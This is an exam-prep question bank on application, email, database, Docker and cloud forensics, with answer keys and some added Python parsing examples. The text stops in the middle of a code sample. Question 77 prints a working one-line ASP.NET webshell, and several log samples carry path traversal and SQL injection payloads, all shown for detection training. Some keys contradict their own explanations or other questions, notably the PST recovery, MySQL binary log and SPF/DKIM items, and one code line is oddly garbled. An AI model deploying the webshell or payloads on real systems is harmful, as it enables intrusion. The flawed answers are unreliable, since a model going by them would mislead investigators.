CCNA Chfi App Email Cloud Questions

75 of 155 questions · Page 2/3 · Chfi App Email Cloud topic · Answers revealed

76
Multi-Select · medium

Which TWO of the following are appropriate techniques for identifying a webshell on a compromised web server?

Select 2 answers
A.Verifying SSL certificate validity
B.Searching for files with recent creation or modification timestamps in the web root
C.Running a full antivirus scan on the server
D.Analyzing web server logs for anomalous POST requests to script files that return 200 OK with large response sizes
E.Checking for open ports on the server
Answers: B, D

Webshells are usually dropped shortly before they are used, so script files in the web root with recent creation or modification times are the first thing to pull; treat timestamps as a lead rather than proof, since an attacker can reset them.

Why this answer

Two complementary signals identify a webshell: recently written script files under the web root (B) and anomalous POST requests to a script file that return 200 with unusually large responses (D), which is what command output looks like in an access log. Certificate validity, open ports and a generic antivirus pass say nothing about this particular artefact.

77
MCQ · hard

During a forensic investigation of a compromised web server, you find a file named 'cmd.aspx' in the uploads directory. The file contains: <%@ Page Language="C#" %><% Response.Write(System.Diagnostics.Process.Start("cmd.exe","/c "+Request.QueryString["cmd"]).StandardOutput.ReadToEnd()); %>. What is the most likely purpose of this file?

A.It is a database connection string
B.It is a legitimate ASP.NET application page for server management
C.It is a webshell used for remote command execution
D.It is a cross-site scripting payload
Answer: C

The page launches cmd.exe with whatever the caller puts in the cmd query string and writes the output back into the HTTP response: a one-line webshell.

Why this answer

This is a webshell. Process.Start runs cmd.exe /c with an attacker-supplied string taken from the 'cmd' query parameter, and StandardOutput.ReadToEnd() returns the command output to the requester, giving remote command execution as the IIS application pool identity. A connection string holds no code, XSS runs in a browser, and no legitimate management page executes raw user input.

78
MCQ · hard

In a Docker container forensics investigation, an analyst needs to examine the file system of a stopped container to look for malicious artifacts. Which command should the analyst run to create a recoverable snapshot of the container's file system without starting the container?

A.docker cp <container_id>:/path /host/path
B.docker export <container_id> -o output.tar
C.docker save <image_id> -o output.tar
D.docker commit <container_id>
Answer: B

docker export writes the container's merged file system to a tar archive without starting it, which is what is wanted for offline analysis.

Why this answer

docker export works on a stopped container and produces a single tar of its file system (image layers plus the writable layer) that can be hashed, extracted and examined with ordinary forensic tooling. Two caveats: the export is flattened, so per-layer history is lost, and data in volumes or bind mounts is not included and must be collected from the host separately. docker save operates on an image rather than a container, docker cp copies individual paths, and docker commit creates a new image layer rather than an analysis-ready archive.

79
MCQ · hard

In an email header, an analyst notices the following: 'Received: from mail.attacker.com (192.168.2.100) by mail.victim.com (Postfix) with ESMTP id ABC123 for <user@victim.com>; ...'. The 'From' address appears as 'ceo@victim.com'. Which type of attack is most likely?

A.Man-in-the-middle
B.Email spoofing
C.Malware attachment
D.Phishing
Answer: B

The mismatch between the From domain and the originating server indicates spoofing.

Why this answer

The email claims to be from 'ceo@victim.com' but was received from 'mail.attacker.com', indicating the sender forged the From address. This is email spoofing.

80
MCQ · easy

An email forensic analyst receives a suspicious email and examines the full headers. Which header field is the MOST reliable for determining the true originating IP address of the sender, assuming no spoofing of the header?

A.Return-Path
B.Received
C.Message-ID
D.From
Answer: B

Each mail server prepends its own Received header, so the bottommost Received header (the first one added) records the originating connection.

Why this answer

Received headers are added by each SMTP server in turn; the first one added sits at the bottom of the block and names the host and IP that initiated the submission. Return-Path, Message-ID and From are supplied by the sender and carry no network-layer evidence. Because everything below the first server you control could have been written by the sender, the trustworthy value is the peer IP recorded in your own server's Received line.

81
MCQ · medium

An analyst is investigating a data exfiltration incident. The MySQL transaction logs show a series of unusual SELECT queries retrieving large amounts of data from the 'customers' table, executed by a user account 'webapp'. What should the analyst check NEXT to determine if the data was actually exfiltrated?

A.Review the web server access logs for requests to external IPs containing the queried data
B.Examine the database schema for unauthorized stored procedures
C.Analyze the MySQL audit logs for privilege escalation attempts
D.Check the MySQL binary logs for any DELETE or DROP statements
Answer: A

The web server's access logs show the requests that drove the queries and how much data was returned to the remote client, which is evidence of actual transfer.

Why this answer

The database log proves the data was read by the webapp account, not that it left the network. The web server access logs show which external client addresses were driving the application during that window and the size of the responses returned to them; large responses to an unfamiliar external IP at the same timestamps link the queries to the exfiltration, and egress proxy or flow logs are the natural follow-up. Stored procedures, privilege escalation and DELETE/DROP statements all concern tampering rather than transfer.

82
MCQ · medium

A cloud forensic investigator is examining AWS CloudTrail logs for signs of unauthorized access to an S3 bucket. Which of the following CloudTrail event names would indicate a successful attempt to list the objects in the bucket?

A.GetObject
B.PutObject
C.DeleteObject
D.ListObjects
Answer: D

ListObjects is the S3 API call that enumerates a bucket's contents.

Why this answer

The CloudTrail event name for enumerating a bucket is ListObjects (ListObjectsV2 calls are recorded under the same name); GetObject, PutObject and DeleteObject read, write and remove individual objects. All four are S3 data events: a trail only records them if object-level logging is enabled for the bucket, so their absence from a trail with default settings proves nothing.

83
MCQ · medium

An IIS log entry shows: `2024-07-15 14:22:10 10.0.0.5 GET /../../windows/system32/cmd.exe 404 - Mozilla/5.0`. What attack technique does this log entry indicate?

A.Remote code execution (RCE)
B.Directory traversal
C.Cross-site request forgery (CSRF)
D.SQL injection
Answer: B

The ../ sequences are used to traverse directories and access cmd.exe, a classic path traversal attempt.

Why this answer

The presence of '../' sequences in the URI path indicates a path traversal attack attempting to access files outside the web root.

84
MCQ · medium

A security analyst finds the following entry in the Apache access log: 10.0.0.5 - - [20/Jan/2023:08:12:44 +0000] "GET /../../../../etc/passwd HTTP/1.1" 404 345 "-" "curl/7.68.0". Which attack was attempted?

A.Remote File Inclusion
B.Path Traversal
C.Command Injection
D.Cross-Site Request Forgery (CSRF)
Answer: B

The '../' sequences are used to navigate directories outside the web root to access sensitive files.

Why this answer

The URI contains '../../../../etc/passwd', which is a path traversal attempt to read the /etc/passwd file. The 404 status indicates the file was not found, but the intent is clear.

85
Multi-Select · medium

An email investigation reveals that a phishing email was sent from a domain that uses DKIM and SPF. The email headers contain: 'DKIM-Signature: v=1; a=rsa-sha256; d=example.com; s=selector1; bh=...; h=...; b=...' and 'Received-SPF: pass (example.com: domain of sender@example.com designates 203.0.113.5 as permitted sender)'. Which TWO conclusions can be drawn?

Select 2 answers
A.The email is definitely legitimate and not spoofed
B.The email's DKIM signature is valid
C.The email was sent from a compromised account
D.The email originated from a different domain
E.The sending server (203.0.113.5) is authorized by the domain's SPF record
AnswersB, E

A valid DKIM signature is present.

Why this answer

SPF pass indicates the sending IP is authorized; DKIM signature validates the email was signed by the domain. Combined, the email is likely not spoofed.

86
MCQ · hard

An analyst finds the following entry in an IIS access log: 10.0.0.5, -, 10/10/2023, 14:30:22, W3SVC1, WEB01, 192.168.1.100, 80, GET, /login.aspx, 200, 0, 1234, 567, Mozilla/5.0+. Based on the log format, which field contains the HTTP status code?

A.200
B.GET
C.80
D.0
Answer: A

The status code is the three-digit HTTP value that follows the request method and URI.

Why this answer

This sample is comma-separated, in the style of the native IIS log format rather than the space-separated W3C extended format, and its field order places the status code immediately after the method and URI. 200 is the HTTP status; GET is the method, 80 is the server port, and the 0 that follows 200 is the substatus or Win32 status. In W3C extended logs the same values are named by the #Fields directive (cs-method, cs-uri-stem, sc-status, sc-substatus), which is the reliable way to locate them.

87
MCQ · medium

A forensic investigator needs to collect evidence from a Google Cloud Platform (GCP) environment. Which of the following GCP services provides audit logs for administrative activities and data access?

A.Cloud Storage logs
B.Cloud Monitoring
C.Cloud IAM
D.Cloud Audit Logs
Answer: D

Cloud Audit Logs record who did what, where and when.

Why this answer

Cloud Audit Logs in GCP record administrative changes (Admin Activity logs, always enabled) and reads and writes of user data (Data Access logs, which are off by default for most services and must be enabled in advance). Cloud Monitoring holds metrics, Cloud IAM is the permission system being audited, and Cloud Storage has no separate audit product.

88
MCQ · medium

A forensic investigator finds a suspicious file named `cmd.aspx` in the web root of a compromised IIS server. The file contains code that accepts command input via HTTP GET parameters and executes it on the server. What is the MOST likely classification of this file?

A.Trojan horse
B.Cross-site scripting (XSS) exploit
C.SQL injection payload
D.Web shell
Answer: D

A web shell allows remote command execution via HTTP requests, fitting the description.

Why this answer

A file that accepts commands via HTTP and executes them on the server is a web shell. ASPX is a common extension for .NET web shells.

89
MCQ · medium

A security analyst is reviewing Apache access logs and finds repeated requests to /index.php?id=1' OR '1'='1. Which type of attack is MOST likely being attempted?

A.Remote file inclusion
B.Path traversal
C.SQL injection
D.Cross-site scripting (XSS)
Answer: C

The payload 1' OR '1'='1 is a standard SQL injection test to manipulate queries.

Why this answer

The pattern 1' OR '1'='1 is a classic SQL injection payload attempting to bypass authentication or extract data. The single quote and OR condition are characteristic of SQLi.

90
Multi-Select · hard

Which TWO of the following are valid methods to collect logs from Docker containers for forensic analysis? (Select TWO)

Select 2 answers
A.Using docker logs command to retrieve container logs
B.Using docker inspect to get log configuration
C.Copying log files from the container using docker cp
D.Using docker exec to run syslog inside the container
E.Using docker image to view the image layers
Answers: A, C

docker logs fetches the console output of the container's main process.

Why this answer

'docker logs' returns the stdout/stderr of the container's PID 1 as captured by the logging driver, and 'docker cp' copies log files out of the container's file system, including from a stopped container. 'docker inspect' only reveals which logging driver is configured, running syslog inside the container alters the evidence, and 'docker image' concerns image layers, not logs.

91
MCQ · medium

Which of the following is a significant challenge in cloud forensics compared to traditional digital forensics?

A.Inability to collect memory dumps
B.Multi-tenancy and data segregation
C.Lack of logging
D.Data volatility
Answer: B

Cloud environments share resources among multiple tenants, complicating evidence isolation.

Why this answer

Multi-tenancy in cloud environments means that evidence from one tenant may be co-mingled with data from other tenants, and isolation can be difficult.

92
MCQ · hard

A forensic analyst is investigating a MySQL database server breach. Which log is MOST useful for identifying a series of queries that exfiltrated data, assuming the attacker used a compromised application account?

A.General query log
B.Binary log
C.Slow query log
D.Error log
Answer: A

The general query log records every statement the server receives, so the exfiltrating SELECTs appear in it.

Why this answer

The MySQL general query log records every connection and every statement, including SELECTs, so reads by a compromised application account are visible in it; it is off by default and costly, so it is only available if it was enabled before the breach. The binary log records only changes (INSERT, UPDATE, DELETE, DDL), the slow query log only statements exceeding a time threshold, and the error log only server errors.

93
MCQ · medium

An email forensic analyst receives a suspicious email and wants to verify the originating IP address. The analyst extracts the email headers and sees multiple 'Received' fields. Which 'Received' header should the analyst consider as the most trustworthy source of the sender's IP?

A.The first 'Received' header at the top
B.The last 'Received' header at the bottom
C.The 'X-Originating-IP' header
D.The 'Return-Path' header
Answer: B

The bottom Received header is the one closest to the sender's MTA and therefore the most informative about the original source.

Why this answer

The lowest (last) 'Received' header is the first hop, written when the sender's MTA handed over the message; headers are added from the bottom up, so the top one describes final delivery. X-Originating-IP is optional and sender-controlled, and Return-Path is an address, not an IP. Only Received lines written by servers you trust are reliable; anything below them may have been forged by the sender.

94
MCQ · hard

An incident responder is analyzing a compromised web server and finds a file named 'cmd.aspx' in the uploads directory. The file contains ASP.NET code that accepts commands via the 'cmd' parameter and executes them on the server. Which of the following best describes this artifact?

A.A legitimate administrative tool for server management
B.A webshell allowing remote command execution
C.A backdoor installed via a SQL injection vulnerability
D.A malware dropper for deploying ransomware
Answer: B

The file accepts commands and executes them, classic webshell behavior.

Why this answer

A web shell is a script uploaded to a web server that allows remote command execution. The filename and behavior match a webshell.

95
Multi-Select · hard

A security analyst is investigating a potential data breach in a GCP environment. The analyst reviews the GCP audit logs and finds the following events: (1) A service account was granted the 'roles/storage.objectAdmin' role on a storage bucket containing sensitive data, (2) The service account then listed objects in the bucket, (3) The service account downloaded several objects. Which THREE actions should the analyst take immediately?

Select 3 answers
A.Analyze the IAM policy change that granted the role to identify the source
B.Revoke the service account's excessive permissions
C.Contact law enforcement immediately
D.Preserve the audit logs by exporting them to a secure location
E.Delete the storage bucket to prevent further access
Answers: A, B, D

Understanding how the grant occurred is crucial.

Why this answer

The analyst should revoke access to prevent further exfiltration, preserve the logs for investigation, and examine the source of the role grant (IAM changes).

96
MCQ · easy

In an email header, which field typically contains the IP address of the original sending client?

A.Return-Path
B.Message-ID
C.Received
D.DKIM-Signature
Answer: C

The Received header records the IP address of the peer that connected to the receiving server. The bottommost Received header typically shows the originating client.

Why this answer

The 'Received' field is added by each mail transfer agent (MTA) that processes the message, and the first 'Received' header (at the bottom of the header block) typically contains the IP address of the original sending client (the SMTP client that initiated the connection). Each line records the 'from' host and IP as seen by the 'by' host, which makes it the primary source for tracing the origin of an email.

Exam trap

EC-Council often tests the misconception that the 'Return-Path' field contains the sender's IP address, when in fact it only holds the email address for bounce handling, not any network-layer information.

How to eliminate wrong answers

Option A is wrong because the 'Return-Path' field contains the envelope sender (the bounce address), not the IP address of the sending client; it is used for non-delivery reports, not for tracing the original source IP. Option B is wrong because the 'Message-ID' field is a unique identifier string generated by the sending MUA or MTA, but it does not contain any IP address information; it is used for message tracking and threading. Option D is wrong because the 'DKIM-Signature' field contains a cryptographic signature and associated domain information (e.g., d=domain), but it does not include the sending client's IP address; it is used for email authentication, not origin IP tracing.
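Questions 80, 93 and 96 all turn on reading the Received chain from the bottom up and on trusting only the lines your own servers wrote. The following Python is an added example (not part of the original question bank) that walks that chain over a constructed message; the hostnames, addresses and the "trusted domain" rule are assumptions for illustration:

```python
"""Walk the Received: chain of a raw message from the bottom up.

Every MTA prepends its own Received: line, so the bottom-most line is the
first hop and the top-most is the last. Lines below the first server you
control were written by someone else and can be forged.
"""
import ipaddress
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed sample: hostnames and addresses are invented / documentation
# ranges, not real infrastructure. The bottom Received: line was written by
# the attacker's own MTA and claims a private source address.
RAW = """\
Received: from mx2.victim.example (mx2.victim.example [198.51.100.20])
\tby mailbox.victim.example (Postfix) with ESMTP id DEF456
\tfor <user@victim.example>; Mon, 15 Jul 2024 14:22:10 +0000
Received: from mail.attacker.example (unknown [203.0.113.77])
\tby mx2.victim.example (Postfix) with ESMTP id ABC123
\tfor <user@victim.example>; Mon, 15 Jul 2024 14:22:09 +0000
Received: from [10.0.0.5] (helo=workstation)
\tby mail.attacker.example with esmtpa id 1abc-0001
From: ceo@victim.example
To: user@victim.example
Subject: Urgent wire transfer
Message-ID: <20240715142209.ABC123@mail.attacker.example>

Please wire the funds today.
"""

IPV4 = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")


def _is_ip(text):
    try:
        ipaddress.ip_address(text)
        return True
    except ValueError:
        return False


def _in_domain(host, domain):
    host, domain = (host or "").lower(), domain.lower()
    return host == domain or host.endswith("." + domain)


def parse_received(value):
    """Split one Received: value into (from_host, from_ip, by_host)."""
    flat = re.sub(r"\s+", " ", value).strip()
    m = re.match(r"from (?P<from>.+?) by (?P<by>\S+)", flat)
    if not m:
        return None, None, None
    from_part = m.group("from")
    ips = [ip for ip in IPV4.findall(from_part) if _is_ip(ip)]
    host = from_part.split()[0].strip("[]")
    return host, (ips[-1] if ips else None), m.group("by")


def hops(raw):
    """All hops, ordered from first (bottom of the header block) to last."""
    msg = message_from_string(raw)
    return [parse_received(v) for v in reversed(msg.get_all("Received") or [])]


def originating_ip(raw, trusted_domain):
    """IP of the peer that handed the message to the first server we control.

    Hops recorded 'by' a host outside trusted_domain are skipped: their
    content is whatever the sender chose to write.
    """
    for _host, ip, by in hops(raw):
        if by and _in_domain(by, trusted_domain):
            return ip
    return None


def from_domain_mismatch(raw, trusted_domain):
    """True when the From: domain differs from the peer host at the first trusted hop."""
    msg = message_from_string(raw)
    from_domain = parseaddr(msg.get("From", ""))[1].rsplit("@", 1)[-1].lower()
    for host, _ip, by in hops(raw):
        if by and _in_domain(by, trusted_domain):
            return not _in_domain(host, from_domain)
    return False
```

Run against the sample, the bottom line claims 10.0.0.5, but that line was written by mail.attacker.example; the first hop recorded by a victim.example server shows the real peer, 203.0.113.77, and its HELO name does not match the From domain.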

97
Multi-Select · easy

Which TWO of the following are indicators of a webshell attack found in web server logs? (Select TWO)

Select 2 answers
A.Abnormal HTTP methods like OPTIONS or TRACE
B.High volume of traffic from a single IP
C.Requests to a .asp or .php file with parameters like cmd or exec
D.Frequent 404 errors for non-existent pages
E.POST requests to a script file in an upload directory
Answers: C, E

Common webshells accept commands via such parameters.

Why this answer

Webshells often involve file uploads to directories like uploads, and subsequent requests to that file with parameters indicating command execution (e.g., cmd=).

98
MCQ · hard

A forensic analyst is examining a PST file extracted from a suspect's computer. The analyst wants to recover deleted emails that are no longer visible in the Outlook folder hierarchy. Which approach is most effective?

A.Perform file carving on the PST file using a forensic tool
B.Open the PST in Outlook and check the 'Recoverable Items' folder
C.Use a hex editor to manually reconstruct deleted emails
D.Use a PST viewer to read the file directly
Answer: B

Outlook's Recoverable Items folder holds deleted items until the retention period expires.

Why this answer

Items deleted from a mailbox first move to Deleted Items and, once removed from there, into the Recoverable Items folder (the "dumpster") until the retention period ends, so that folder is the first place to look. Note that Recoverable Items is a feature of Exchange and Microsoft 365 mailboxes; a standalone PST has no dumpster, so for a PST whose Deleted Items folder has been emptied the practical route is carving the file's unallocated space (compare question 117).

99
MCQ · medium

In MySQL forensics, which log file is most commonly used to detect unauthorized data exfiltration or changes to database records?

A.Binary log
B.Slow query log
C.General query log
D.Error log
Answer: A

The binary log records every data change, which makes it the primary source for identifying tampering with records.

Why this answer

The binary log (binlog) records all changes to data and schema (INSERT, UPDATE, DELETE, DDL) with timestamps, so it is the forensic source for reconstructing modifications. Keep in mind that SELECT statements are never written to it: read-only exfiltration leaves no trace in the binlog and has to be found in the general query log, audit plugin output or the application tier.

100
MCQ · medium

A forensic analyst is examining a Microsoft Outlook PST file as part of an email investigation. Which tool is specifically designed to parse and analyze PST files and extract email metadata?

A.Wireshark
B.EmailTracker
C.Sleuth Kit
D.Aid4Mail
Answer: D

Aid4Mail is a forensic email extraction and analysis tool.

Why this answer

Aid4Mail is a forensic email analysis tool that supports PST, OST, MBOX, and other formats. It is commonly used for email investigations.

101
MCQ · medium

Which tool is specifically designed to extract metadata from email messages, including tracking the route and identifying the originating IP address?

A.EmailTracker
B.Wireshark
C.MailXaminer
D.Outlook
Answer: A

EmailTracker specializes in analyzing email headers and metadata for forensic purposes.

Why this answer

EmailTracker is a tool that analyzes email headers to trace the path and identify the source IP, often used in email forensics.

102
MCQ · hard

During a forensic investigation of a compromised web server, an analyst finds the following entry in the IIS access log: 192.168.1.5, -, 04/May/2024:14:23:11, GET /scripts/..%5c../windows/system32/cmd.exe, 200. What is the probable attack vector?

A.Brute force attack
B.Cross-site scripting
C.Path traversal
D.SQL injection
Answer: C

The ..%5c.. sequence is a URL-encoded backslash traversal aimed at cmd.exe.

Why this answer

The request walks out of the /scripts directory using ..%5c (a percent-encoded backslash), the classic IIS traversal that targets cmd.exe in system32. The 200 status indicates the server served the request rather than rejecting it, so the follow-up should assume command execution was possible.

103
MCQ · easy

In database forensics, which type of log records every transaction (including INSERT, UPDATE, DELETE) and allows reconstruction of database changes over time?

A.Audit log
B.Error log
C.Transaction log
D.Slow query log
Answer: C

Transaction logs capture every data modification operation.

Why this answer

Transaction logs (redo logs in Oracle, the binary log in MySQL, the write-ahead log in PostgreSQL) record every change to the database so that it can be recovered or replayed to a point in time, which also lets an investigator reconstruct the sequence of modifications. They do not record read-only queries; an audit log or general query log is needed for those.

104
MCQ · hard

An analyst is investigating a possible data exfiltration via email. The analyst notices that the email headers contain a DKIM-Signature field that is invalid. Which of the following does a failed DKIM check indicate?

A.The email's content has been modified since it was signed
B.The email was sent through a proxy server
C.The email client does not support DKIM
D.The email was sent from a different domain than the one in the From field
Answer: A

A failed DKIM check means the signature no longer matches the message, which is what tampering produces.

Why this answer

DKIM signs selected headers and a hash of the body, so verification fails when any signed part has changed since signing. A failure therefore points to modification in transit, though benign causes exist: a mailing list or gateway that adds a footer or rewrites the subject, or a selector key that has been removed from DNS. A DKIM failure does not by itself prove spoofing or identify a different sending domain; it tells you the message cannot be relied on as the signer sent it.
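Questions 85 and 104 both hinge on what an SPF or DKIM result does and does not prove. The Python below is an added example, not taken from the page, that reads the verdicts from a constructed Authentication-Results header and checks whether either one is aligned with the From domain, the way a DMARC evaluation would; the sample headers, domains and the strict-alignment rule are assumptions for illustration:

```python
"""Read SPF/DKIM verdicts from the receiving server's Authentication-Results
header and check whether either one is aligned with the From: domain.

A DKIM-Signature header on its own only shows that someone signed the
message; the verdict lives in Authentication-Results, added by the
verifier. A pass for example.com says nothing about a From: address in
another domain, which is exactly the gap spoofed From: headers exploit.
"""
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed samples; domains and addresses are invented.
# SPF and DKIM both pass for example.com, but the From: domain is different.
UNALIGNED = """\
Authentication-Results: mx.victim.example;
\tdkim=pass header.d=example.com header.s=selector1;
\tspf=pass smtp.mailfrom=sender@example.com
Received-SPF: pass (example.com: domain of sender@example.com designates 203.0.113.5 as permitted sender)
DKIM-Signature: v=1; a=rsa-sha256; d=example.com; s=selector1; h=from:to:subject; bh=MTIz; b=QUJD
From: "CEO" <ceo@victim.example>
To: user@victim.example
Subject: Invoice

Body
"""

# Same verdicts, From: now in the authenticated domain.
ALIGNED = UNALIGNED.replace('From: "CEO" <ceo@victim.example>', "From: sender@example.com")

# A signature header but no verifier verdict at all.
UNVERIFIED = "\n".join(
    line for line in UNALIGNED.splitlines()
    if not line.startswith(("Authentication-Results", "\t", "Received-SPF"))
) + "\n"


def parse_auth_results(value):
    """Map method -> {'result': verdict, plus property=value pairs}."""
    flat = re.sub(r"\s+", " ", value)
    result = {}
    for clause in flat.split(";")[1:]:          # clause 0 is the authserv-id
        m = re.match(r"\s*(\w+)=(\w+)(.*)", cl_ause := clause) if False else re.match(r"\s*(\w+)=(\w+)(.*)", clause)
        if m:
            method, verdict, rest = m.groups()
            result[method] = {"result": verdict, **dict(re.findall(r"(\S+?)=(\S+)", rest))}
    return result


def _domain(addr):
    return parseaddr(addr)[1].rsplit("@", 1)[-1].lower()


def assess(raw):
    """The authentication picture a DMARC-style check would see."""
    msg = message_from_string(raw)
    from_domain = _domain(msg.get("From", ""))
    ar = parse_auth_results(msg.get("Authentication-Results", ""))
    dkim, spf = ar.get("dkim", {}), ar.get("spf", {})
    sig = msg.get("DKIM-Signature", "")
    d_tag = re.search(r"\bd=([^;\s]+)", sig)
    dkim_domain = (dkim.get("header.d") or (d_tag.group(1) if d_tag else "")).lower()
    spf_domain = _domain(spf.get("smtp.mailfrom", "")) if spf else ""
    dkim_result = dkim.get("result", "signed-unverified" if sig else "none")
    return {
        "from_domain": from_domain,
        "dkim": dkim_result,
        "dkim_domain": dkim_domain,
        "dkim_aligned": dkim_result == "pass" and dkim_domain == from_domain,
        "spf": spf.get("result", "none"),
        "spf_domain": spf_domain,
        "spf_aligned": spf.get("result") == "pass" and spf_domain == from_domain,
    }


def from_is_authenticated(raw):
    """True only when a passing SPF or DKIM result is aligned with From: (strict alignment)."""
    a = assess(raw)
    return a["dkim_aligned"] or a["spf_aligned"]
```

On the first sample both checks pass, yet nothing vouches for victim.example, so the From address is unauthenticated; the second sample passes because the signer and the From domain agree; the third has a signature but no verdict and is reported as signed-unverified rather than as a pass.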

105
Multi-Select · medium

Which TWO of the following are common indicators of a path traversal attack found in web server logs? (Select 2)

Select 2 answers
A.Requests containing a large number of User-Agent strings
B.Requests containing '../' sequences
C.Requests containing '<script>' tags
D.Requests containing '%2e%2e%2f'
E.Requests containing 'OR 1=1'
Answers: B, D

'../' is the literal directory-traversal sequence.

Why this answer

Path traversal attacks use '../' sequences or encoded forms of them to reach files outside the web root; '%2e%2e%2f' is the percent-encoded form of '../'. Both B and D are typical signatures. '<script>' indicates XSS, 'OR 1=1' indicates SQL injection, and a spread of User-Agent strings is not a traversal indicator.

106
MCQ · hard

A forensic analyst is investigating a webshell on an IIS server. The access.log shows: 10.0.0.5, -, 12/Mar/2023:14:22:10 +0000, POST /uploads/cmd.aspx, 200, 0, 1234. Which log entry is most indicative of webshell activity?

A.The use of POST method on an ASPX file
B.The small response size of 1234 bytes
C.The lack of a user-agent in the log
D.The file path '/uploads/cmd.aspx' and the 200 status code
Answer: D

The name 'cmd.aspx' suggests command execution, and an uploads directory is a common webshell location.

Why this answer

A script named cmd.aspx sitting in an uploads directory and answering with 200 is the strongest signal: uploads should hold user content, not executable pages, and the successful status shows the server ran it. A POST to an ASPX page, a small response and a missing user-agent are each common in legitimate traffic, so on their own they are weak evidence.

107
MCQ · hard

During a cloud forensics investigation, an analyst examines AWS CloudTrail logs and finds an event with "userIdentity":{"type":"AssumedRole","arn":"arn:aws:sts::123456789012:assumed-role/AdminRole/i-0abcd1234efgh5678"}. What does the 'i-0abcd1234efgh5678' portion most likely represent?

A.The AWS account ID of the role's trusted entity
B.The role's unique identifier assigned by IAM
C.The unique ID of the IAM user who assumed the role
D.The session name, which is typically the EC2 instance ID
Answer: D

An EC2 instance assuming a role through its instance profile uses its instance ID as the session name.

Why this answer

In an assumed-role ARN the last path element is the role session name. The session name is chosen by whoever calls AssumeRole; when an EC2 instance profile obtains credentials, the session name is the instance ID, which the 'i-' prefix reflects. The account ID is the 12-digit number, and the role name is the element before the session name.

108
MCQ · medium

An incident responder is analyzing AWS CloudTrail logs to determine if an unauthorized user accessed an S3 bucket. Which of the following CloudTrail event fields should be examined to identify the IAM user or role that made the API call?

A.sourceIPAddress
B.eventSource
C.requestParameters
D.userIdentity
Answer: D

Contains identity details of the requester.

Why this answer

The userIdentity field contains details about the identity that made the request, including ARN, user name, and type (IAM user, role, etc.).

109
MCQ · easy

In email forensics, which artifact is stored in Outlook's Personal Folders (.pst) files and can be analyzed using tools like Aid4Mail or EmailTracker?

A.Only the email body text
B.Emails and attachments only
C.Email headers only
D.Emails, attachments, calendars, contacts, and other mailbox items
Answer: D

.pst files are comprehensive mailbox archives.

Why this answer

.pst files contain emails, attachments, calendars, contacts, and other mailbox items for offline access. Aid4Mail can parse these files for forensic analysis.

110
MCQ · hard

During a cloud forensic investigation, an analyst discovers that an AWS EC2 instance was used to launch an attack. The instance has been terminated. Which source is MOST likely to contain evidence of the commands executed on the instance?

A.VPC Flow Logs
B.EC2 instance metadata
C.AWS Systems Manager Agent logs
D.AWS CloudTrail logs
Answer: C

SSM Agent records Run Command and Session Manager activity, and that record survives instance termination if it was sent to CloudWatch Logs or S3.

Why this answer

AWS CloudTrail records the API calls that managed the instance (RunInstances, TerminateInstances, SendCommand) but not the commands executed at the OS level. VPC Flow Logs capture network metadata, and instance metadata describes configuration and vanishes with the instance.

AWS Systems Manager Agent (SSM Agent) logs the commands executed through Run Command and Session Manager; if the account was configured to ship that output to CloudWatch Logs or S3, it remains available after the instance is gone.

111
Multi-Select · easy

A forensic analyst is examining a Docker container image for malware. Which TWO techniques can help analyze the image layers?

Select 2 answers
A.Use 'docker history' to view the build history of the image
B.Use 'docker images' to list all images
C.Use 'docker inspect' to view the image metadata
D.Use 'docker save' to export the image as a tar file and extract layers
E.Use 'docker export' on a running container
Answers: A, D

Shows each layer and the command that created it.

Why this answer

'docker history' shows the build commands and layers, which helps identify suspicious steps. 'docker export' exports the container filesystem but not layers individually. 'docker save' saves the image as a tar, allowing layer extraction. 'docker inspect' shows metadata only. 'docker images' lists images.

112
MCQ · easy

Which tool is specifically designed to extract and analyze email metadata, including headers, from various email client formats such as PST and OST files?

A.Wireshark
B.EmailTracker
C.Aid4Mail
D.FTK Imager
Answer: C

Aid4Mail is a forensic email extraction tool that supports PST, OST, MBOX, and many other formats, allowing metadata analysis.

Why this answer

Aid4Mail is a commercial forensic tool that can extract emails and metadata from PST, OST, MBOX, and other formats. EmailTracker is primarily for tracking email delivery, not forensic analysis of client files.

113
MCQ · medium

An analyst reviews an Apache access log entry: '192.168.1.10 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?id=1%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 1234 "-" "Mozilla/5.0"'. Which attack does this log entry most likely indicate?

A.SQL injection (SQLi) attack
B.Cross-site scripting (XSS) attack
C.Path traversal attack
D.Remote file inclusion (RFI) attack
Answer: A

The payload includes SQL logical operators and quotes, indicating a SQL injection attempt.

Why this answer

The URL-encoded payload contains SQL injection syntax (%27 is a single quote), attempting to inject an OR condition. This is indicative of a SQL injection attempt.

114
MCQ · medium

In an AWS environment, a security analyst detects unusual API calls that created several IAM users with administrative privileges from an unfamiliar IP address. Which AWS service log should be examined first to identify the specific API calls and the IAM user that made them?

A.Amazon S3 access logs
B.AWS CloudWatch Logs
C.AWS CloudTrail
D.AWS Config
Answer: C

CloudTrail records AWS API calls, making it the primary source for investigating API activity.

Why this answer

AWS CloudTrail records management API calls such as CreateUser and AttachUserPolicy together with the caller identity (userIdentity), source IP address, event time and request parameters. The last 90 days are available in the console event history even without a configured trail. S3 access logs, CloudWatch Logs and AWS Config do not capture who issued the IAM calls.
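Questions 82, 107, 108 and 114 are all about pulling the right fields out of CloudTrail records. The Python below is an added example (not from the page or from AWS) that triages a constructed batch of records: it lists every call against one bucket with the principal resolved from userIdentity, splits an assumed-role ARN into role and session name, and isolates the IAM calls that create identities or hand out rights. The account ID, names, addresses and the set of "privilege" event names are assumptions:

```python
"""Triage a batch of CloudTrail records: who touched a bucket, and which
identity created users or attached policies, from where.

Management events (IAM calls) are recorded by every trail; S3 object-level
calls such as GetObject and ListObjects are data events and only appear when
the trail was configured to log them.
"""
import json

ROLE_SESSION_ARN = "arn:aws:sts::123456789012:assumed-role/AdminRole/i-0abcd1234efgh5678"

# Constructed records in the CloudTrail JSON shape; account ID, names and
# IPs are placeholders.
RECORDS_JSON = json.dumps({"Records": [
    {"eventTime": "2024-07-15T14:20:01Z", "eventSource": "s3.amazonaws.com",
     "eventName": "ListObjects", "readOnly": True,
     "userIdentity": {"type": "AssumedRole", "arn": ROLE_SESSION_ARN},
     "sourceIPAddress": "203.0.113.9",
     "requestParameters": {"bucketName": "corp-hr-data"}},
    {"eventTime": "2024-07-15T14:20:30Z", "eventSource": "s3.amazonaws.com",
     "eventName": "GetObject", "readOnly": True,
     "userIdentity": {"type": "AssumedRole", "arn": ROLE_SESSION_ARN},
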